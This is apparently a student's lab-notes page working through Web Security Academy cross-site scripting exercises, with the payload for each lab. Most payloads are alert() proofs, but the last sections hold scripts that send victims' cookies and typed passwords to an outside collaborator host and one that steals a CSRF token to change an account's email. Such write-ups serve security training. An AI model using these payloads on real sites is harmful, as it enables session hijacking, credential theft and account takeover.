Cross Site Scripting (XSS)

sible XSS Payload

https://github.com/payloadbox/xss-payload-listgithub.com

PayloadsAllTheThings/XSS Injection/README.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Cross-Site Scripting (XSS) Cheat Sheet - 2026 Edition | Web Security AcademyWebSecAcademy

Potential Vector

hashchange

<iframe src="https://0aa7008a038f15ccb09c4c4900c000e7.web-security-academy.net/#" onload=print(1)>

String Arithmatic

'-alert(1)-'

AngularJS

If the part has ng-app, it is possible to get DOM XSS.

{{ this.constructor.constructor('alert("foo")')() }}

Random Payloads

\"-alert(1)}//
<><img src=1 onload=alert(1)>
\'-alert(1)//

jQuery anchor href attribute using location.search source

<script>
    $(function() {
        $('#backLink').attr("href", (new URLSearchParams(window.location.search)).get('returnPath'));
    });
</script>

jQuery selector sink using a hashchange event

$(window).on('hashchange', function() {
	var element = $(location.hash);
	element[0].scrollIntoView();
});

Payload

<iframe src="https://0a1e008804b81db380f803e800fb0029.web-security-academy.net#" onload="this.src+='<img src=1 onerror=print()>'">

XSS with AngularJS

Must have ng-app attribute on HTML element

Payload

PayloadsAllTheThings/XSS Injection/5 - XSS in Angular.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Reflected DOM XSS

Under the search got another script that is being run

This request will be sent each time we are searching for something

Payload

\"-alert(1)}//

Stored DOM XSS

There is this script that will run when displaying the comments

There is a escape HTML function being used

The function is being used at the author portion of the form

Payload

<><img src=1 onerror=alert(1)>

Reflected XSS into attribute with angle brackets HTML-encoded

We will realised that the > and < are HTML encoded

Payload

Just put this in the search bar to trigger the XSS

" autofocus onfocus=alert(document.domain) x="

Stored XSS into anchor href attribute with double quotes HTML-encoded

We can see that whatever we put into the website portion, it will get reflected out, in this case http://test

Payload

javascript:alert(1)

Canonical Link Tag

In the source, we can see that there is a rel="canonical" attribute in the source code

We can also add anything behind and it will be reflected

Payload

Just add the accesskey and onclick attribute at the back

https://0a3900ff04d5fcf4cb883c560075002d.web-security-academy.net/?%27accesskey=%27X%27onclick=%27alert(1)%27

Reflected XSS into a Javascript string with single quote and backslash escaped

We can see that any input that we give the search bar, it will be reflected on the source on the page

Payload

We will need to escape the <script> tag to trigger the XSS

';</script><img src=1 onerror=alert(1)>'

Reflected XSS into a JavaScript string with angle brackets HTML encoded

Similar to the previous lab, whatever gets put into the search bar, will be reflected on the source

Payload

'-alert(1)//

Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped

Similar to the previous lab, whatever gets put into the search bar, will be reflected on the source

Payload

It needs to escape the string to treat it as a single quote

\'-alert(1)//

Stored XSS into onclick event with angle bracket and double quotes HTML-encoded an single quotes and backslash escaped

The website field will reflect out in the onclick attribute

Payload

http://foo?&apos;-alert(1)-&apos;

Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped

We can see that the search term gets reflected in the <script> tag below

Payload

${alert(document.domain)}

Exploiting cross-site scripting to steal cookies

The Comment field is vulnerable to XSS

Payload

<script>document.location="http://<COLLABORATOR URL>?c="+document.cookie</script>

Exploiting cross-site scripting to capture password

Same as the previous lab, the Comment section is vulnerable to XSS

Payload

<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

Exploiting XSS to bypass CSRF defenses

Same as the previous lab, the Comment field is vulnerable to XSS

Payload

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>

PreviousDOM-based Vulnerabilities NextProving Ground Play

Last updated 10 months ago

hashtagPotential Vector

hashtaghashchange

hashtagString Arithmatic

hashtagAngularJS

hashtagRandom Payloads

hashtagjQuery anchor href attribute using location.search source

hashtagjQuery selector sink using a hashchange event

hashtagPayload

hashtagXSS with AngularJS

hashtagReflected DOM XSS

hashtagPayload

hashtagStored DOM XSS

hashtagPayload

hashtagReflected XSS into attribute with angle brackets HTML-encoded

hashtagPayload

hashtagStored XSS into anchor href attribute with double quotes HTML-encoded

hashtagPayload

hashtagCanonical Link Tag

hashtagPayload

hashtagReflected XSS into a Javascript string with single quote and backslash escaped

hashtagPayload

hashtagReflected XSS into a JavaScript string with angle brackets HTML encoded

hashtagPayload

hashtagReflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped

hashtagPayload

hashtagStored XSS into onclick event with angle bracket and double quotes HTML-encoded an single quotes and backslash escaped

hashtagPayload

hashtagReflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped

hashtagPayload

hashtagExploiting cross-site scripting to steal cookies

hashtagPayload

hashtagExploiting cross-site scripting to capture password

hashtagPayload

hashtagExploiting XSS to bypass CSRF defenses

hashtagPayload

Potential Vector

hashchange

String Arithmatic

AngularJS

Random Payloads

jQuery anchor href attribute using location.search source

jQuery selector sink using a hashchange event

Payload

XSS with AngularJS

Reflected DOM XSS

Payload

Stored DOM XSS

Payload

Reflected XSS into attribute with angle brackets HTML-encoded

Payload

Stored XSS into anchor href attribute with double quotes HTML-encoded

Payload

Canonical Link Tag

Payload

Reflected XSS into a Javascript string with single quote and backslash escaped

Payload

Reflected XSS into a JavaScript string with angle brackets HTML encoded

Payload

Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped

Payload

Stored XSS into onclick event with angle bracket and double quotes HTML-encoded an single quotes and backslash escaped

Payload

Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped

Payload

Exploiting cross-site scripting to steal cookies

Payload

Exploiting cross-site scripting to capture password

Payload

Exploiting XSS to bypass CSRF defenses

Payload